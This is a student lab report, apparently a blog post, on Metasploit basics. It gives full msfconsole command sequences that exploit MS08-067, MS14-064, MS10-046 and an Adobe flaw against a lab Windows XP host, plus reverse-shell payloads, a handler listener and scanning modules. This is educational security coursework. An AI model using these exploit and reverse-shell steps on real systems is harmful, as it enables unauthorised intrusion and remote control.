标签:tag 作用 两台 details 扫描 load failed tps sdn
目录:
2019-2020-2 20175335《网络对抗技术》Exp6 MSF基础应用
1、 MSF主要模块:指Metasploit框架中所使用的一段软件代码组件
/usr/share/metasploit-framework/modules2、 用户操作界面
3、 MSF常用漏洞指令
search name:用指定关键字搜索可以利用的漏洞模块use exploit name:使用漏洞show options:显示配置选项set option name option:设置选项show payloads:回链攻击载荷show targets: 显示目标(os版本)set TARGET target number:设置目标版本exploit:开始漏洞攻击sessions -l:列出会话sessions -i id:选择会话sessions -k id:结束会话Ctrl+z:把会话放到后台Ctrl+c:结束会话show auxiliary:显示辅助模块use auxiliary name:使用辅助模块set option name option:设置选项exploit:运行模块Q:用自己的话解释什么是exploit,payload,encode.
Q:离实战还缺些什么技术或步骤?
ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限。
实现:ms08_067
攻击机:Kali 172.16.135.149
靶机:Windows xp 172.16.135.161
payload : generic/shell_reverse_tcp
测试靶机与攻击机之间能否ping通
win xp ping:

kali ping:

nmap -sS -A --script=smb-vuln-ms08-067 -PO 172.16.135.161

msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi,如下图所示:
use exploit/windows/smb/ms08_067_netapi进入攻击模块,使用show payloads,查看能够使用的payloads
set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数
set RHOST 172.16.135.161 //设置靶机IP set LPORT 5335 //设置攻击机端口 set LHOST 172.16.135.149//设置攻击机IP exploit

ipconfig查看信息!
攻击成功!

net user查看Win目前的用户名。
启动msfconsole,然后输入search ms14_064查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution,如下图所示:

use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数
set LHOST 172.16.135.149 set LPORT 5335 set URIPATH 5335dzlb//设置url域名 exploit

http://172.16.135.149:8080/5335dzlb

sessions查看会话信息。
sessions -i 1获取第一个会话连接,并输入ipconfig验证是否为靶机地址,使用dir查看文件目录。
启动msfconsole,然后输入searchms10_046查找该漏洞使用的攻击模块,攻击模块为exploit/windows/browser/ms10_046_shortcut_icon_dllloader,如下图所示:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数。
1 set SRVHOST 172.16.135.149 2 set LHOST 172.16.135.149 3 exploit

http://172.16.135.149弹出如下窗口。

sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。sessions -i 1控制靶机(-i后面的数即为靶机对应的序号),并输入ipconfig查看主机IP地址。
msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton,如下图所示:
use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options查看要设置的参数。
1 set RHOST 172.16.135.161 //设置靶机IP 2 set LPORT 5335 //设置攻击机端口 3 set LHOST 172.16.135.149 //设置攻击机IP 4 exploit

msfconsole进入控制台use exploit/multi/handler 使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcpset LHOST 172.16.135.149set LPORT 5335exploit开始监听
ipconfig 
cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期
输入search cert首先查看辅助模块cert辅助模块的信息

use auxiliary/scanner/telnet/telnet_version set RHOSTS 172.16.135.149/24 set THREADS 50 run



TCP"XMas"端口扫描(唯一)
search xmas首先查看xmas辅助模块的信息
use auxiliary/scanner/portscan/xmas set RHOST 172.16.135.149 set ports 5335 run

问题1:出现“ Kali linux-Exploit failed [unreachable]:Rex::ConnectionTimeout Could not determine the exact service pack ”等等问题?!
解决办法:(1)靶机windows xp sp3要装英文版。(2)靶机的防火墙一定要关闭。(3)使用ping命令测试两台主机是否可以互联 再次exploit,发现成功!(https://blog.csdn.net/qq_41363459/article/details/105621436)
问题2:
解决办法:权限问题! + sudo msfconsole!
本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。在亲身进行了各个漏洞利用的实践后也更明白了修复漏洞的重要性,需要不断维护系统,保证其处于一个较为安全的环境,通过查阅资料也锻炼了我的自学能力和了解到很多大佬的超级操作!实时羡慕! 也收获到不少知识!
2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用
标签:tag 作用 两台 details 扫描 load failed tps sdn
原文地址:https://www.cnblogs.com/DLuob/p/12818308.html